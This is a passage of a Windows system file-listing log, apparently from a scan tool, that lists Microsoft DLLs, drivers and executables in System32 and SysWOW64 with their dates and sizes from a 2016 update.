00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00168800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS 2016-09-15 05:01 - 2016-09-15 05:01 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\XamlTileRender.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00151224 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00141824 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DscCoreConfProv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00133472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00114192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MapControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinelsa.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncPolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00079536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00077664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00073568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncPolicy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00062816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00057400 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AddressParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00044472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00041824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceassociation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\encapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\delegatorprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi_passthru.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00020320 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_IS2022.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\c_GSM7.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosTrace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spwmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosHost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccessRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx 2016-09-15 05:01 - 2016-09-15 05:01 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdxm.ocx 2016-09-15 05:01 - 2016-09-15 05:01 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxmasf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneutilRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6r.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlStringsRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll 2016-09-15 04:59 - 2016-09-15 04:59 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2016-09-15 04:59 - 2016-09-15 01:04 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2016-09-15 04:59 - 2016-07-15 23:58 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DxToolsReportGenerator.dll 2016-09-15 04:59 - 2016-07-15 23:28 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsProxyStub.dll 2016-09-15 04:59 - 2016-07-15 23:28 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARP12Debug.dll 2016-09-15 04:59 - 2016-07-15 23:26 - 00376320 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DXCpl.exe 2016-09-15 04:59 - 2016-07-15 23:26 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARPDebug.dll 2016-09-15 04:59 - 2016-07-15 23:25 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXGIDebug.dll 2016-09-15 04:59 - 2016-07-15 23:23 - 14388224 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCaptureReplay.dll 2016-09-15 04:59 - 2016-07-15 23:22 - 00429056 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1debug3.dll 2016-09-15 04:59 - 2016-07-15 23:22 - 00355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\perf_gputiming.dll 2016-09-15 04:59 - 2016-07-15 23:19 - 01323520 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11_3SDKLayers.dll 2016-09-15 04:59 - 2016-07-15 23:16 - 05850624 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsDesktopEngine.exe 2016-09-15 04:59 - 2016-07-15 23:16 - 04969472 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsRemoteEngine.exe 2016-09-15 04:59 - 2016-07-15 23:15 - 06582784 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12warp.dll 2016-09-15 04:59 - 2016-07-15 23:13 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsOfflineAnalysis.dll 2016-09-15 04:59 - 2016-07-15 23:13 - 01198592 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCap.exe 2016-09-15 04:59 - 2016-07-15 23:13 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsCapture.dll 2016-09-15 04:59 - 2016-07-15 23:12 - 00297984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsExperiment.dll 2016-09-15 04:59 - 2016-07-15 23:12 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsMonitor.dll 2016-09-15 04:59 - 2016-07-15 23:11 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsReporting.dll 2016-09-15 04:59 - 2016-07-15 22:58 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DxToolsReportGenerator.dll 2016-09-15 04:59 - 2016-07-15 22:44 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsProxyStub.dll 2016-09-15 04:59 - 2016-07-15 22:43 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARP12Debug.dll 2016-09-15 04:59 - 2016-07-15 22:42 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARPDebug.dll 2016-09-15 04:59 - 2016-07-15 22:41 - 00355840 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DXCpl.exe 2016-09-15 04:59 - 2016-07-15 22:41 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXGIDebug.dll 2016-09-15 04:59 - 2016-07-15 22:39 - 11670528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCaptureReplay.dll 2016-09-15 04:59 - 2016-07-15 22:38 - 00371712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1debug3.dll 2016-09-15 04:59 - 2016-07-15 22:37 - 01074176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11_3SDKLayers.dll 2016-09-15 04:59 - 2016-07-15 22:35 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perf_gputiming.dll 2016-09-15 04:59 - 2016-07-15 22:32 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsDesktopEngine.exe 2016-09-15 04:59 - 2016-07-15 22:32 - 03701248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsRemoteEngine.exe 2016-09-15 04:59 - 2016-07-15 22:31 - 04977664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12warp.dll 2016-09-15 04:59 - 2016-07-15 22:29 - 00953344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCap.exe 2016-09-15 04:59 - 2016-07-15 22:29 - 00231424 _____ (Microsoft Corporation) 